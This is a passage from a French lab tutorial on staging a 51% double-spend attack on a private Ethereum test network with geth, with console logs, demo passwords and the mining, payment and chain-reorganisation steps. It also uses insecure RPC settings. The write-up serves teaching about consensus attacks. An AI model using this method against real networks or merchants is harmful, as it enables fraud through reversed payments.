INFO [03-08|13:24:54.138] Your new key was generated               address=0xEAB6fFe92041e39233C95451A72Cf5E82cD23297
WARN [03-08|13:24:54.138] Please backup your key file!             path=/root/blockchain_51/maliciousMiner/data/keystore/UTC--2020-03-08T12-24-53.901555019Z--eab6ffe92041e39233c95451a72cf5e82cd23297
WARN [03-08|13:24:54.138] Please remember your password!
"0xeab6ffe92041e39233c95451a72cf5e82cd23297"
> personal
{
  listAccounts: ["0xeab6ffe92041e39233c95451a72cf5e82cd23297"],
  listWallets: [{
      accounts: [{...}],
      status: "Locked",
      url: "keystore:///root/blockchain_51/maliciousMiner/data/keystore/UTC--2020-03-08T12-24-53.901555019Z--eab6ffe92041e39233c95451a72cf5e82cd23297"
  }],
  deriveAccount: function(),
  ecRecover: function(),
  getListAccounts: function(callback),
  getListWallets: function(callback),
  importRawKey: function(),
  initializeWallet: function(),
  lockAccount: function(),
  newAccount: function(),
  openWallet: function(),
  sendTransaction: function(),
  sign: function(),
  signTransaction: function(),
  unlockAccount: function(),
  unpair: function()
}
> admin.nodeInfo.enode
"enode://92d5d085f7c834762dd190095508d470f8dc001975e6d7a8689fb6b69ba1f749bdff8e2be1a1d948b78c850e7bfe017cbb31d998161e6112f608b7435d7d6ef0@109.15.242.225:60303"
> exit
INFO [03-08|13:25:01.919] HTTP endpoint closed                     url=http://127.0.0.1:8545
INFO [03-08|13:25:01.920] IPC endpoint closed                      url=/root/blockchain_51/maliciousMiner/data/geth.ipc
INFO [03-08|13:25:01.920] Blockchain manager stopped
INFO [03-08|13:25:01.920] Stopping Ethereum protocol
INFO [03-08|13:25:01.920] Ethereum protocol stopped
INFO [03-08|13:25:01.920] Transaction pool stopped
```

##### maliciousPerson

- account : *maliciousPerson*
- password : *maliciousperson*

Lorsque vous accédez à la console avec la commande suivante, vous devez exécuter ``personal.newAccount()`` afin de créer le compte honestMiner, puis ``admin.nodeInfo.enode`` afin d'obtenir les informations de l'enode, enfin, la commande ``personal`` pour obtenir toutes les informations personnelles du mineur.

{- Sur l'hôte maliciousPerson -}

`geth --nousb --networkid 15 --port 60306 --rpc --rpcport 8547 --lightkdf --cache 16 --datadir maliciousPerson/data console`
```shell
INFO [03-08|13:26:42.177] Maximum peer count                       ETH=50 LES=0 total=50
INFO [03-08|13:26:42.177] Smartcard socket not found, disabling    err="stat /run/pcscd/pcscd.comm: no such file or directory"
INFO [03-08|13:26:42.178] Starting peer-to-peer node               instance=Geth/v1.9.11-stable-6a62fe39/linux-amd64/go1.13.8
INFO [03-08|13:26:42.179] Allocated trie memory caches             clean=4.00MiB dirty=4.00MiB
INFO [03-08|13:26:42.179] Allocated cache and file handles         database=/root/blockchain_51/maliciousPerson/data/geth/chaindata cache=16.00MiB handles=524288
INFO [03-08|13:26:42.475] Opened ancient database                  database=/root/blockchain_51/maliciousPerson/data/geth/chaindata/ancient
INFO [03-08|13:26:42.476] Initialised chain configuration          config="{ChainID: 15 Homestead: 0 DAO: <nil> DAOSupport: false EIP150: 0 EIP155: 0 EIP158: 0 Byzantium: <nil> Constantinople: <nil> Petersburg: <nil> Istanbul: <nil>, Muir Glacier: <nil>, Engine: unknown}"
INFO [03-08|13:26:42.476] Disk storage enabled for ethash caches   dir=/root/blockchain_51/maliciousPerson/data/geth/ethash count=3
INFO [03-08|13:26:42.476] Disk storage enabled for ethash DAGs     dir=/root/.ethash count=2
INFO [03-08|13:26:42.476] Initialising Ethereum protocol           versions="[65 64 63]" network=15 dbversion=<nil>
WARN [03-08|13:26:42.476] Upgrade blockchain database version      from=<nil> to=7
INFO [03-08|13:26:42.478] Loaded most recent local header          number=0 hash=2d326d…48d0a3 td=10 age=50y10mo4w
INFO [03-08|13:26:42.478] Loaded most recent local full block      number=0 hash=2d326d…48d0a3 td=10 age=50y10mo4w
INFO [03-08|13:26:42.478] Loaded most recent local fast block      number=0 hash=2d326d…48d0a3 td=10 age=50y10mo4w
INFO [03-08|13:26:42.478] Regenerated local transaction journal    transactions=0 accounts=0
INFO [03-08|13:26:42.479] Allocated fast sync bloom                size=8.00MiB
INFO [03-08|13:26:42.481] Initialized fast sync bloom              items=1 errorrate=0.000 elapsed=940.104µs
INFO [03-08|13:26:42.553] New local node record                    seq=1 id=b39e22b794d9c0ab ip=127.0.0.1 udp=60306 tcp=60306
INFO [03-08|13:26:42.554] Started P2P networking                   self=enode://3310b580969280325f202366271c58ee55061ea5532e5ac26aeaa4dc05acbea2692b0ed668f3075ad03aa0fd062b2d66ca706aa3e05566827ebada69d1b37b01@127.0.0.1:60306
INFO [03-08|13:26:42.558] IPC endpoint opened                      url=/root/blockchain_51/maliciousPerson/data/geth.ipc
INFO [03-08|13:26:42.559] HTTP endpoint opened                     url=http://127.0.0.1:8547 cors= vhosts=localhost
WARN [03-08|13:26:42.641] Served eth_coinbase                      reqid=3 t=26.339µs err="etherbase must be explicitly specified"
Welcome to the Geth JavaScript console!

instance: Geth/v1.9.11-stable-6a62fe39/linux-amd64/go1.13.8
at block: 0 (Thu Jan 01 1970 01:00:00 GMT+0100 (CET))
 datadir: /root/blockchain_51/maliciousPerson/data
 modules: admin:1.0 debug:1.0 eth:1.0 ethash:1.0 miner:1.0 net:1.0 personal:1.0 rpc:1.0 txpool:1.0 web3:1.0

> INFO [03-08|13:26:44.395] New local node record                    seq=2 id=b39e22b794d9c0ab ip=109.15.242.225 udp=60306 tcp=60306
> personINFO [03-08|13:26:52.620] Looking for peers                        peercount=1 tried=94 static=0
> personal.newAccount()
Passphrase:
Repeat passphrase:
INFO [03-08|13:27:12.891] Your new key was generated               address=0x11f7d3EE650Bac6f676D4fc51dbBE153D590BC8a
WARN [03-08|13:27:12.891] Please backup your key file!             path=/root/blockchain_51/maliciousPerson/data/keystore/UTC--2020-03-08T12-27-12.640367351Z--11f7d3ee650bac6f676d4fc51dbbe153d590bc8a
WARN [03-08|13:27:12.891] Please remember your password!
"0x11f7d3ee650bac6f676d4fc51dbbe153d590bc8a"
> INFO [03-08|13:27:13.045] Looking for peers                        peercount=2 tried=62 static=0
> personal
{
  listAccounts: ["0x11f7d3ee650bac6f676d4fc51dbbe153d590bc8a"],
  listWallets: [{
      accounts: [{...}],
      status: "Locked",
      url: "keystore:///root/blockchain_51/maliciousPerson/data/keystore/UTC--2020-03-08T12-27-12.640367351Z--11f7d3ee650bac6f676d4fc51dbbe153d590bc8a"
  }],
  deriveAccount: function(),
  ecRecover: function(),
  getListAccounts: function(callback),
  getListWallets: function(callback),
  importRawKey: function(),
  initializeWallet: function(),
  lockAccount: function(),
  newAccount: function(),
  openWallet: function(),
  sendTransaction: function(),
  sign: function(),
  signTransaction: function(),
  unlockAccount: function(),
  unpair: function()
}
> admin.nodeInfo.enodINFO [03-08|13:27:23.129] Looking for peers                        peercount=1 tried=141 static=0
> admin.nodeInfo.enode
"enode://3310b580969280325f202366271c58ee55061ea5532e5ac26aeaa4dc05acbea2692b0ed668f3075ad03aa0fd062b2d66ca706aa3e05566827ebada69d1b37b01@109.15.242.225:60306"
> exit
INFO [03-08|13:27:24.959] HTTP endpoint closed                     url=http://127.0.0.1:8547
INFO [03-08|13:27:24.959] IPC endpoint closed                      url=/root/blockchain_51/maliciousPerson/data/geth.ipc
INFO [03-08|13:27:24.959] Blockchain manager stopped
INFO [03-08|13:27:24.959] Stopping Ethereum protocol
INFO [03-08|13:27:24.959] Ethereum protocol stopped
INFO [03-08|13:27:24.959] Transaction pool stopped
```

L'information importante ici est l'adresse ethereum privée de la personne malveillante : *0x11f7d3ee650bac6f676d4fc51dbbe153d590bc8a*

#### Minage

Pour attaquer, l'attaquant aura besoin :

- d'être synchronisé avec l'honestMineur
- d'avoir un certain nombre d'éthereums afin d'exécuter une transaction

Le maliciousMiner devra saisir la valeur de l'enode du honestMiner afin d'être synchronisé :

{- Sur l'hôte maliciousMiner -}

`geth --nousb --networkid 15 --port 60303 --rpc --rpcport 8545 --rpccorsdomain "*" --datadir maliciousMiner/data --miner.threads 1 --bootnodes "enode://c6ab8727e45dee49304d48a89b8250ef4d792316340b7f1c48b63e1d627915a532f06f1fd8b8390c78d35acda1eeb9d08ddbf60466dd658ffc50395315aa2026@192.168.0.17:60303"`
```shell
WARN [03-08|13:32:09.680] Sanitizing cache to Gos GC limits       provided=1024 updated=656
INFO [03-08|13:32:09.680] Maximum peer count                       ETH=50 LES=0 total=50
INFO [03-08|13:32:09.680] Smartcard socket not found, disabling    err="stat /run/pcscd/pcscd.comm: no such file or directory"
INFO [03-08|13:32:09.682] Starting peer-to-peer node               instance=Geth/v1.9.11-stable-6a62fe39/linux-amd64/go1.13.8
INFO [03-08|13:32:09.682] Allocated trie memory caches             clean=164.00MiB dirty=164.00MiB
INFO [03-08|13:32:09.682] Allocated cache and file handles         database=/root/blockchain_51/maliciousMiner/data/geth/chaindata cache=328.00MiB handles=524288
INFO [03-08|13:32:09.913] Opened ancient database                  database=/root/blockchain_51/maliciousMiner/data/geth/chaindata/ancient
INFO [03-08|13:32:09.914] Initialised chain configuration          config="{ChainID: 15 Homestead: 0 DAO: <nil> DAOSupport: false EIP150: 0 EIP155: 0 EIP158: 0 Byzantium: <nil> Constantinople: <nil> Petersburg: <nil> Istanbul: <nil>, Muir Glacier: <nil>, Engine: unknown}"
INFO [03-08|13:32:09.914] Disk storage enabled for ethash caches   dir=/root/blockchain_51/maliciousMiner/data/geth/ethash count=3
INFO [03-08|13:32:09.914] Disk storage enabled for ethash DAGs     dir=/root/.ethash count=2
INFO [03-08|13:32:09.914] Initialising Ethereum protocol           versions="[65 64 63]" network=15 dbversion=7
INFO [03-08|13:32:09.915] Loaded most recent local header          number=0 hash=2d326d…48d0a3 td=10 age=50y10mo4w
INFO [03-08|13:32:09.915] Loaded most recent local full block      number=0 hash=2d326d…48d0a3 td=10 age=50y10mo4w
INFO [03-08|13:32:09.915] Loaded most recent local fast block      number=0 hash=2d326d…48d0a3 td=10 age=50y10mo4w
INFO [03-08|13:32:09.915] Loaded local transaction journal         transactions=0 dropped=0
INFO [03-08|13:32:09.916] Regenerated local transaction journal    transactions=0 accounts=0
INFO [03-08|13:32:09.922] Allocated fast sync bloom                size=328.00MiB
INFO [03-08|13:32:09.925] Initialized fast sync bloom              items=1 errorrate=0.000 elapsed=2.063ms
INFO [03-08|13:32:10.227] New local node record                    seq=3 id=358c5618374a8627 ip=127.0.0.1 udp=60303 tcp=60303
INFO [03-08|13:32:10.229] Started P2P networking                   self=enode://92d5d085f7c834762dd190095508d470f8dc001975e6d7a8689fb6b69ba1f749bdff8e2be1a1d948b78c850e7bfe017cbb31d998161e6112f608b7435d7d6ef0@127.0.0.1:60303
INFO [03-08|13:32:10.230] IPC endpoint opened                      url=/root/blockchain_51/maliciousMiner/data/geth.ipc
INFO [03-08|13:32:10.231] HTTP endpoint opened                     url=http://127.0.0.1:8545 cors=* vhosts=localhost
INFO [03-08|13:32:13.873] Block synchronisation started
INFO [03-08|13:32:13.891] Imported new state entries               count=3 elapsed=5.212ms processed=3 pending=0 retry=0 duplicate=0 unexpected=0
INFO [03-08|13:32:15.482] Imported new block headers               count=192 elapsed=1.485s  number=192 hash=cf25a5…459e2b
INFO [03-08|13:32:15.490] Imported new block receipts              count=128 elapsed=1.671ms number=128 hash=e93c19…23766a age=3m4s      size=512.00B
INFO [03-08|13:32:15.498] Imported new state entries               count=2   elapsed=3.876ms processed=5 pending=0 retry=0 duplicate=0 unexpected=0
INFO [03-08|13:32:15.498] Imported new block receipts              count=1   elapsed=75.315µs number=129 hash=33cdaa…abc5e0 age=3m3s      size=4.00B
INFO [03-08|13:32:15.499] Committed new head block                 number=129 hash=33cdaa…abc5e0
INFO [03-08|13:32:15.585] Deallocated fast sync bloom              items=6 errorrate=0.000
INFO [03-08|13:32:15.604] Imported new chain segment               blocks=63 txs=0 mgas=0.000 elapsed=18.650ms mgasps=0.000 number=192 hash=cf25a5…459e2b dirty=27.93KiB
INFO [03-08|13:32:17.001] Imported new block headers               count=2   elapsed=5.509ms  number=194 hash=397a21…656bfa
INFO [03-08|13:32:17.002] Imported new chain segment               blocks=2  txs=0 mgas=0.000 elapsed=752.225µs mgasps=0.000 number=194 hash=397a21…656bfa dirty=28.82KiB
INFO [03-08|13:32:17.084] Fast sync complete, auto disabling
INFO [03-08|13:32:23.200] Imported new chain segment               blocks=1  txs=0 mgas=0.000 elapsed=4.129ms   mgasps=0.000 number=195 hash=aafd44…c4763e dirty=29.26KiB
INFO [03-08|13:32:26.066] Imported new chain segment               blocks=1  txs=0 mgas=0.000 elapsed=4.889ms   mgasps=0.000 number=196 hash=59aa1b…c3c1af dirty=29.71KiB  |  
```

on peut voir ici que le maliciousMiner est synchronisé avec le honestMiner : les bloc sont importés :

```shell
Imported new chain segment               blocks=1  txs=0 mgas=0.000 elapsed=4.129ms   mgasps=0.000 number=195 hash=aafd44…c4763e dirty=29.26KiB
```

**Tuez le terminal précédent.**

Afin d'avoir une chaîne plus longue que l'honestMiner, avec un hashrate plus élevé, l'attaquant devra rompre la synchronisation avec l'honestMiner et miner tout seul avec 4 CPU supplémentaires !

{- Sur l'hôte maliciousMiner -}

`geth --nousb --networkid 15 --port 60303 --rpc --rpcport 8545 --rpccorsdomain "*" --datadir maliciousMiner/data --miner.threads 4 --mine`
```shell
WARN [03-08|13:36:13.134] Sanitizing cache to Gos GC limits       provided=1024 updated=656
INFO [03-08|13:36:13.138] Maximum peer count                       ETH=50 LES=0 total=50
INFO [03-08|13:36:13.138] Smartcard socket not found, disabling    err="stat /run/pcscd/pcscd.comm: no such file or directory"
INFO [03-08|13:36:13.139] Starting peer-to-peer node               instance=Geth/v1.9.11-stable-6a62fe39/linux-amd64/go1.13.8
INFO [03-08|13:36:13.139] Allocated trie memory caches             clean=164.00MiB dirty=164.00MiB
INFO [03-08|13:36:13.139] Allocated cache and file handles         database=/root/blockchain_51/maliciousMiner/data/geth/chaindata cache=328.00MiB handles=524288
INFO [03-08|13:36:13.478] Opened ancient database                  database=/root/blockchain_51/maliciousMiner/data/geth/chaindata/ancient
INFO [03-08|13:36:13.479] Initialised chain configuration          config="{ChainID: 15 Homestead: 0 DAO: <nil> DAOSupport: false EIP150: 0 EIP155: 0 EIP158: 0 Byzantium: <nil> Constantinople: <nil> Petersburg: <nil> Istanbul: <nil>, Muir Glacier: <nil>, Engine: unknown}"
INFO [03-08|13:36:13.479] Disk storage enabled for ethash caches   dir=/root/blockchain_51/maliciousMiner/data/geth/ethash count=3
INFO [03-08|13:36:13.479] Disk storage enabled for ethash DAGs     dir=/root/.ethash count=2
INFO [03-08|13:36:13.479] Initialising Ethereum protocol           versions="[65 64 63]" network=15 dbversion=7
INFO [03-08|13:36:13.480] Loaded most recent local header          number=254 hash=c145e9…0e5ca0 td=35367758 age=34s
INFO [03-08|13:36:13.480] Loaded most recent local full block      number=254 hash=c145e9…0e5ca0 td=35367758 age=34s
INFO [03-08|13:36:13.480] Loaded most recent local fast block      number=254 hash=c145e9…0e5ca0 td=35367758 age=34s
```
{- LE MAINTENIR EN MARCHE -}

maliciousPerson devra lancer un autre mineur afin d'avoir un certain nombre d'éthereum à transférer :

{- Sur l'hôte maliciousPerson -}

`geth --nousb --networkid 15 --port 60305 --rpc --rpcport 8547 --rpccorsdomain "*" --datadir maliciousPerson/data --miner.threads 1 --bootnodes "enode://c6ab8727e45dee49304d48a89b8250ef4d792316340b7f1c48b63e1d627915a532f06f1fd8b8390c78d35acda1eeb9d08ddbf60466dd658ffc50395315aa2026@192.168.0.17:60303" --mine --allow-insecure-unlock`
```shell
WARN [03-08|13:38:33.113] Sanitizing cache to Gos GC limits       provided=1024 updated=656
INFO [03-08|13:38:33.113] Maximum peer count                       ETH=50 LES=0 total=50
INFO [03-08|13:38:33.113] Smartcard socket not found, disabling    err="stat /run/pcscd/pcscd.comm: no such file or directory"
INFO [03-08|13:38:33.114] Starting peer-to-peer node               instance=Geth/v1.9.11-stable-6a62fe39/linux-amd64/go1.13.8
INFO [03-08|13:38:33.114] Allocated trie memory caches             clean=164.00MiB dirty=164.00MiB
INFO [03-08|13:38:33.114] Allocated cache and file handles         database=/root/blockchain_51/maliciousPerson/data/geth/chaindata cache=328.00MiB handles=524288
INFO [03-08|13:38:33.601] Opened ancient database                  database=/root/blockchain_51/maliciousPerson/data/geth/chaindata/ancient
INFO [03-08|13:38:33.602] Initialised chain configuration          config="{ChainID: 15 Homestead: 0 DAO: <nil> DAOSupport: false EIP150: 0 EIP155: 0 EIP158: 0 Byzantium: <nil> Constantinople: <nil> Petersburg: <nil> Istanbul: <nil>, Muir Glacier: <nil>, Engine: unknown}"
INFO [03-08|13:38:33.602] Disk storage enabled for ethash caches   dir=/root/blockchain_51/maliciousPerson/data/geth/ethash count=3
INFO [03-08|13:38:33.602] Disk storage enabled for ethash DAGs     dir=/root/.ethash count=2
INFO [03-08|13:38:33.602] Initialising Ethereum protocol           versions="[65 64 63]" network=15 dbversion=7
INFO [03-08|13:38:33.604] Loaded most recent local header          number=0 hash=2d326d…48d0a3 td=10 age=50y10mo4w
INFO [03-08|13:38:33.604] Loaded most recent local full block      number=0 hash=2d326d…48d0a3 td=10 age=50y10mo4w
INFO [03-08|13:38:33.604] Loaded most recent local fast block      number=0 hash=2d326d…48d0a3 td=10 age=50y10mo4w
INFO [03-08|13:38:33.604] Loaded local transaction journal         transactions=0 dropped=0
INFO [03-08|13:38:33.605] Regenerated local transaction journal    transactions=0 accounts=0
INFO [03-08|13:38:33.617] Allocated fast sync bloom                size=328.00MiB
INFO [03-08|13:38:33.618] Initialized fast sync bloom              items=1 errorrate=0.000 elapsed=950.435µs
INFO [03-08|13:38:33.726] New local node record                    seq=3 id=b39e22b794d9c0ab ip=127.0.0.1 udp=60305 tcp=60305
INFO [03-08|13:38:33.726] Started P2P networking                   self=enode://3310b580969280325f202366271c58ee55061ea5532e5ac26aeaa4dc05acbea2692b0ed668f3075ad03aa0fd062b2d66ca706aa3e05566827ebada69d1b37b01@127.0.0.1:60305
INFO [03-08|13:38:33.729] IPC endpoint opened                      url=/root/blockchain_51/maliciousPerson/data/geth.ipc
INFO [03-08|13:38:33.729] HTTP endpoint opened                     url=http://127.0.0.1:8547 cors=* vhosts=localhost
INFO [03-08|13:38:33.729] Transaction pool price threshold updated price=1000000000
INFO [03-08|13:38:33.729] Updated mining threads                   threads=1
INFO [03-08|13:38:33.730] Transaction pool price threshold updated price=1000000000
INFO [03-08|13:38:33.730] Etherbase automatically configured       address=0x11f7d3EE650Bac6f676D4fc51dbBE153D590BC8a
INFO [03-08|13:38:33.730] Commit new mining work                   number=1 sealhash=e63e8d…61596d uncles=0 txs=0 gas=0 fees=0 elapsed=164.912µs
INFO [03-08|13:38:34.257] Successfully sealed new block            number=1 sealhash=e63e8d…61596d hash=9d5ad0…3026a6 elapsed=526.954ms
INFO [03-08|13:38:34.257] 🔨 mined potential block                  number=1 hash=9d5ad0…3026a6
INFO [03-08|13:38:34.258] Commit new mining work                   number=2 sealhash=49e567…746b3d uncles=0 txs=0 gas=0 fees=0 elapsed=487.802µs
INFO [03-08|13:38:34.731] Successfully sealed new block            number=2 sealhash=49e567…746b3d hash=a31a73…79494f elapsed=473.858ms
INFO [03-08|13:38:34.741] 🔨 mined potential block                  number=2 hash=a31a73…79494f
INFO [03-08|13:38:34.732] Commit new mining work                   number=3 sealhash=353f5f…a8d55a uncles=0 txs=0 gas=0 fees=0 elapsed=222.024µs
INFO [03-08|13:38:37.930] Successfully sealed new block            number=3 sealhash=353f5f…a8d55a hash=2233eb…184930 elapsed=3.197s
INFO [03-08|13:38:37.930] 🔨 mined potential block                  number=3 hash=2233eb…184930
INFO [03-08|13:38:37.930] Commit new mining work                   number=4 sealhash=7fbd98…060758 uncles=0 txs=0 gas=0 fees=0 elapsed=329.098µs
INFO [03-08|13:38:38.282] Successfully sealed new block            number=4 sealhash=7fbd98…060758 hash=d7ba82…75812d elapsed=352.636ms
INFO [03-08|13:38:38.283] Commit new mining work                   number=5 sealhash=6b2da0…422fd0 uncles=0 txs=0 gas=0 fees=0 elapsed=266.942µs
INFO [03-08|13:38:38.293] 🔨 mined potential block                  number=4 hash=d7ba82…75812d
INFO [03-08|13:38:38.353] Successfully sealed new block            number=5 sealhash=6b2da0…422fd0 hash=e62713…0cb3bb elapsed=70.130ms
INFO [03-08|13:38:38.353] 🔨 mined potential block                  number=5 hash=e62713…0cb3bb
INFO [03-08|13:38:38.353] Commit new mining work                   number=6 sealhash=d77e5c…b9fd76 uncles=0 txs=0 gas=0 fees=0 elapsed=247.89µs
INFO [03-08|13:38:39.317] Successfully sealed new block            number=6 sealhash=d77e5c…b9fd76 hash=afdafb…acb151 elapsed=963.600ms
INFO [03-08|13:38:39.317] 🔨 mined potential block                  number=6 hash=afdafb…acb151
INFO [03-08|13:38:39.317] Commit new mining work                   number=7 sealhash=c209ef…e0507e uncles=0 txs=0 gas=0 fees=0 elapsed=234.739µs
INFO [03-08|13:38:43.574] Successfully sealed new block            number=7 sealhash=c209ef…e0507e hash=17c796…c9b8c3 elapsed=4.256s
INFO [03-08|13:38:43.574] 🔨 mined potential block                  number=7 hash=17c796…c9b8c3
INFO [03-08|13:38:43.574] Commit new mining work                   number=8 sealhash=02ec4f…008ddf uncles=0 txs=0 gas=0 fees=0 elapsed=246.359µs
INFO [03-08|13:38:43.727] Block synchronisation started
INFO [03-08|13:38:43.727] Mining aborted due to sync
INFO [03-08|13:38:43.781] Imported new state entries               count=3 elapsed=42.971ms  processed=3 pending=0 retry=0 duplicate=0 unexpected=0
INFO [03-08|13:38:45.412] Imported new block headers               count=192 elapsed=1.564s    number=192 hash=cf25a5…459e2b age=6m38s
INFO [03-08|13:38:45.422] Imported new block receipts              count=192 elapsed=1.963ms   number=192 hash=cf25a5…459e2b age=6m38s     size=768.00B
INFO [03-08|13:38:47.011] Imported new block headers               count=111 elapsed=157.650ms number=303 hash=13e30f…401e32
INFO [03-08|13:38:47.015] Imported new block receipts              count=47  elapsed=559.986µs number=239 hash=16bc76…843790 age=3m53s     size=188.00B
INFO [03-08|13:38:47.068] Imported new state entries               count=2   elapsed=51.539ms  processed=5 pending=0 retry=0 duplicate=0 unexpected=0
INFO [03-08|13:38:47.069] Imported new block receipts              count=1   elapsed=85.425µs  number=240 hash=318848…7a1d55 age=3m46s     size=4.00B
INFO [03-08|13:38:47.069] Committed new head block                 number=240 hash=318848…7a1d55
INFO [03-08|13:38:47.151] Deallocated fast sync bloom              items=6 errorrate=0.000
INFO [03-08|13:38:47.170] Imported new chain segment               blocks=63 txs=0 mgas=0.000 elapsed=18.133ms  mgasps=0.000 number=303 hash=13e30f…401e32 dirty=28.17KiB
INFO [03-08|13:38:49.932] Imported new block headers               count=2   elapsed=78.648ms  number=305 hash=ae0530…b7e9ab
INFO [03-08|13:38:49.934] Imported new chain segment               blocks=2  txs=0 mgas=0.000 elapsed=764.886µs mgasps=0.000 number=305 hash=ae0530…b7e9ab dirty=29.06KiB
INFO [03-08|13:38:49.937] Fast sync complete, auto disabling
INFO [03-08|13:38:49.938] 😱 block lost                             number=1   hash=9d5ad0…3026a6
INFO [03-08|13:38:49.938] 😱 block lost                             number=2   hash=a31a73…79494f
INFO [03-08|13:38:49.938] 😱 block lost                             number=3   hash=2233eb…184930
INFO [03-08|13:38:49.938] 😱 block lost                             number=4   hash=d7ba82…75812d
INFO [03-08|13:38:49.939] 😱 block lost                             number=5   hash=e62713…0cb3bb
INFO [03-08|13:38:49.939] 😱 block lost                             number=6   hash=afdafb…acb151
INFO [03-08|13:38:49.939] 😱 block lost                             number=7   hash=17c796…c9b8c3
INFO [03-08|13:38:49.939] Commit new mining work                   number=306 sealhash=c4dbfb…84d5ff uncles=0 txs=0 gas=0 fees=0 elapsed=2.451ms
INFO [03-08|13:38:52.792] Imported new chain segment               blocks=1  txs=0 mgas=0.000 elapsed=6.008ms   mgasps=0.000 number=306 hash=69b853…2967d8 dirty=29.50KiB
INFO [03-08|13:38:52.792] Commit new mining work                   number=307 sealhash=f827e8…a52fb8 uncles=0 txs=0 gas=0 fees=0 elapsed=164.509µs
INFO [03-08|13:38:54.509] Imported new chain segment               blocks=1  txs=0 mgas=0.000 elapsed=4.280ms   mgasps=0.000 number=307 hash=a72436…fabb4c dirty=29.94KiB
INFO [03-08|13:38:54.510] Commit new mining work                   number=308 sealhash=c02e25…c4fdb1 uncles=0 txs=0 gas=0 fees=0 elapsed=164.361µs
INFO [03-08|13:38:55.349] Imported new chain segment               blocks=1  txs=0 mgas=0.000 elapsed=3.952ms   mgasps=0.000 number=308 hash=fa998b…65b606 dirty=30.39KiB
INFO [03-08|13:38:55.349] Commit new mining work                   number=309 sealhash=7a542d…f9c966 uncles=0 txs=0 gas=0 fees=0 elapsed=187.086µs
```
{- LE MAINTENIR EN MARCHE -}

Ensuite, ouvrez une session avec votre maliciousPerson et exécutez une transaction pour le site marchand par exemple.
Pour créer une transaction, vous avez besoin de l'adresse ethereum privée de maliciousPerson, de l'adresse ethereum publique du site marchand et du montant.

Pour commencer, vous devez déverrouiller le compte de la maliciousPerson avec son adresse privée et le mot de passe donné lors de la création de son compte : ```personal.unlockAccount("0x11f7d3EE650Bac6f676D4fc51dbBE153D590BC8a","maliciousperson")```

Envoyez ensuite une transaction vers le site marchand : ```web3.eth.sendTransaction({from: "0x11f7d3EE650Bac6f676D4fc51dbBE153D590BC8a", to: "0xe82e809d5f9574b54a4b8ead7e195b163b39662f", value: 1000000000000000000})```

Le retour de la transaction est son ID dans la blockchain, vous pouvez obtenir plus d'informations à ce sujet si vous exécutez : ```web3.eth.getTransactionReceipt("TRANSACTION_ID")```

{- Sur l'hôte maliciousPerson -}

`geth --ipcpath geth.ipc --datadir maliciousPerson/data attach`
```shell
Welcome to the Geth JavaScript console!

instance: Geth/v1.9.11-stable-6a62fe39/linux-amd64/go1.13.8
coinbase: 0x11f7d3ee650bac6f676d4fc51dbbe153d590bc8a
at block: 429 (Sun Mar 08 2020 13:43:07 GMT+0100 (CET))
 datadir: /root/blockchain_51/maliciousPerson/data
 modules: admin:1.0 debug:1.0 eth:1.0 ethash:1.0 miner:1.0 net:1.0 personal:1.0 rpc:1.0 txpool:1.0 web3:1.0

> personal.unlockAccount("0x11f7d3EE650Bac6f676D4fc51dbBE153D590BC8a", "maliciousperson")
true
> web3.eth.sendTransaction({from: "0x11f7d3EE650Bac6f676D4fc51dbBE153D590BC8a", to: "0xe82e809d5f9574b54a4b8ead7e195b163b39662f", value: 1000000000000000000})
"0x2db31525f37ecfb38ef934c125ae9534a4889325142caa336b9acf8b112a5696"
> web3.eth.getTransactionReceipt("0x2db31525f37ecfb38ef934c125ae9534a4889325142caa336b9acf8b112a5696")
{
  blockHash: "0x8bbdd1a3187d11361bd3759f82e9de037bbd254e50fbda75cc564446016a568f",
  blockNumber: 466,
  contractAddress: null,
  cumulativeGasUsed: 21000,
  from: "0x11f7d3ee650bac6f676d4fc51dbbe153d590bc8a",
  gasUsed: 21000,
  logs: [],
  logsBloom: "0x00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000",
  root: "0x42e9a4ca7eb3f7a59d33a35c6f608d642bf128d7b969a1a2f4250bc8c74c55ab",
  to: "0xe82e809d5f9574b54a4b8ead7e195b163b39662f",
  transactionHash: "0x2db31525f37ecfb38ef934c125ae9534a4889325142caa336b9acf8b112a5696",
  transactionIndex: 0
}
```

Comme on peut le voir, la transaction est créé et validée par l'honestMiner au bloc *466*.

Maintenant, ouvrez une session avec le maliciousMiner et synchronisez-vous avec le honestMiner avec la commande : *admin.addPeer()* :

{- Sur l'hôte maliciousMiner -}

`geth --ipcpath geth.ipc --datadir maliciousMiner/data attach`
```shell
Welcome to the Geth JavaScript console!

instance: Geth/v1.9.11-stable-6a62fe39/linux-amd64/go1.13.8
coinbase: 0xeab6ffe92041e39233c95451a72cf5e82cd23297
at block: 556 (Sun Mar 08 2020 13:43:06 GMT+0100 (CET))
 datadir: /root/blockchain_51/maliciousMiner/data
 modules: admin:1.0 debug:1.0 eth:1.0 ethash:1.0 miner:1.0 net:1.0 personal:1.0 rpc:1.0 txpool:1.0 web3:1.0

> admin.addPeer("enode://c6ab8727e45dee49304d48a89b8250ef4d792316340b7f1c48b63e1d627915a532f06f1fd8b8390c78d35acda1eeb9d08ddbf60466dd658ffc50395315aa2026@192.168.0.17:60303")
true
```

La synchronisation est faite, et si vous vérifiez les logs de l'honestMiner, vous devez voir la synchronisation avec le maliciousMineur. Son dernier numéro de bloc était le 491, et avec la synchronisation, il a réorganisé la blockchain du block 237 au 660.

```shell
INFO [03-08|13:45:50.194] Successfully sealed new block            number=491 sealhash=0dae97…415534 hash=f118f2…66313c elapsed=1.648s
INFO [03-08|13:45:50.194] 🔗 block reached canonical chain          number=484 hash=c5ce1d…bb2fe0
INFO [03-08|13:45:50.195] Commit new mining work                   number=492 sealhash=d72305…1b336c uncles=0 txs=0 gas=0     fees=0       elapsed=907.748µs
INFO [03-08|13:45:50.195] 🔨 mined potential block                  number=491 hash=f118f2…66313c
INFO [03-08|13:45:51.882] Block synchronisation started
INFO [03-08|13:45:51.883] Mining aborted due to sync
INFO [03-08|13:45:54.026] Importing sidechain segment              start=14 end=638
WARN [03-08|13:45:54.198] Large chain reorg detected               number=254 hash=c145e9…0e5ca0 drop=237 dropfrom=f118f2…66313c add=237 addfrom=d307a6…cba24c
